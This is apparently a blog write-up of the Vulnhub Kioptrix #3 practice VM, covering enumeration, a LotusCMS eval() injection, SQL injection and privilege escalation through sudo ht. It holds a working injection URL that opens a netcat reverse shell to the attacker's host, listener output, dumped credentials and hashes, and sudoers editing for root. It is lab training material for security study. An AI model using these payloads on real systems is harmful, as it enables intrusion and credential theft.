Vulnhub - Kioptrix #3 Writeup

4 minute read

Vulnhub - Kioptrix #3

Enumeration

Lets add kioptrix3.com to hosts file and start off with Nmap

Nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-03 16:34 IST
Nmap scan report for 192.168.71.130
Host is up (0.0026s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:93:F2:E6 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.25 seconds

Found some interesting urls by browsing around and using dirb.

http://kioptrix3.com/phpmyadmin/
http://kioptrix3.com/gallery/gadmin/
http://kioptrix3.com/index.php?system=Admin

There are lot of methods to compromise this system. I will try to explain the ones I found.

User Shell Method 1 (Lotus CMS RCE)

The webserver is using LotusCms. A quick search using searchsploit yielded some RCE

Searchsploit

kali@kali:~$ searchsploit lotuscms
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)               | exploits/php/remote/18565.rb

Its a metasploit module. However since use of metasploit is limited during OSCP, I exploited it without metasploit

Understanding LotusCms RCE

This module exploits a vulnerability found in Lotus CMS 3.0’s Router() function. This is done by embedding PHP code in the ‘page’ parameter, which will be passed to a eval call, therefore allowing remote code execution.

So we can escape the eval call and execute our own php code by appending ');

A reverse shell can be execute using the following code

kioptrix3.com/index.php?page=index');exec("nc -e /bin/bash 192.168.174.3 1234"); //

Setup a nc listener to catch the request and use python pty module to upgrade it to a full TTY shell

kali@kali:~$ nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.174.3] from kioptrix3.com [192.168.174.5] 34305
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Kioptrix3:/home/www/kioptrix3.com$

Low Shell Enumeration

There is a file named gconfig.php in /home/www/kioptrix3.com/gallery that contains the db credentials

www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat gconfig.php
cat gconfig.php
-------output snipped---------------
        $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

        $GLOBALS["gallarific_mysql_server"] = "localhost";
        $GLOBALS["gallarific_mysql_database"] = "gallery";
        $GLOBALS["gallarific_mysql_username"] = "root";
        $GLOBALS["gallarific_mysql_password"] = "fuckeyou";
-------output snipped---------------

We can use these credential to login to phpmyadmin and find credentials for dreg and loneferret and use it to SSH into the box. But we have to crack the hashes to get the password.

image1

User Shell Method 2 (SQL Injection)

The web server is using Gallarific. It contains an SQL Injection in the following url.

http://kioptrix3.com/gallery/gallery.php?id=1%27&sort=filename#photos

image1

The sql error indicates that sql injection is possible. Lets dump the database using sqlmap

SqlMap

Database: gallery
Table: dev_accounts
[2 entries]
+----+----------------------------------+------------+
| id | password                         | username   |
+----+----------------------------------+------------+
| 1  | 0d3eccfb887aabd50f243b3f155c0f85 | dreg       |
| 2  | 5badcaf789d3d1d09794d8f021f40f0e | loneferret |
+----+----------------------------------+------------+

Database: gallery
Table: gallarific_users
[1 entry]
+--------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+-------------+
| userid | email   | photo   | website | joincode | lastname | password | username | usertype  | firstname | datejoined | issuperuser |
+--------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+-------------+
| 1      | <blank> | <blank> | <blank> | <blank>  | User     | n0t7t1k4 | admin    | superuser | Super     | 1302628616 | 1           |

sqlmap found login for the users dreg and loneferret and also logins for gallarffic.

These hashes can be cracked using rainbow tables or by brute forcing.

Crackstation (Rainbow Table Attack)

We can crack the hashes using online rainbow table hash cracker. Crackstaion image1

Root Shell

After SSHing into the box we can see that there is a file named CompanyPolicy.README which contains the following text.

loneferret@Kioptrix3:/home/loneferret# cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

So we can run sudo ht. ht is a text editor and since its running as root we can gain root using one these methods

  1. Edit sudoers file
  2. Add our key to ssh
  3. Change the password file.

Since method 1 is the easiest, lets do it that way.

Before using ht we have to set the $TERM env variable to xterm

loneferret@Kioptrix3:/home/loneferret#export TERM=xterm

So lets open sudoers file and add /bin/sh to it.

image1

And we are root!

Afterthoughts

This box was comparatively easy to root. But that was not the case for me. This was because I failed to enumerate the box properly. Once I found a possible exploit I immediately abandoned further enumeration and focused on that method alone and ended up getting stuck and had to look for hints. So I have learned a very important lesson form this box. Enumeration is the most important step.
There seems to be a kernel exploit available for this box, but I did not try that out.

Further reading

  1. Manual SQL Injection. Can’t use sqlmap during OSCP
  2. Structure of sudoers file
  3. Autorecon. An excellent tool for automating enumeration

Tags:

Categories:

Updated:

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.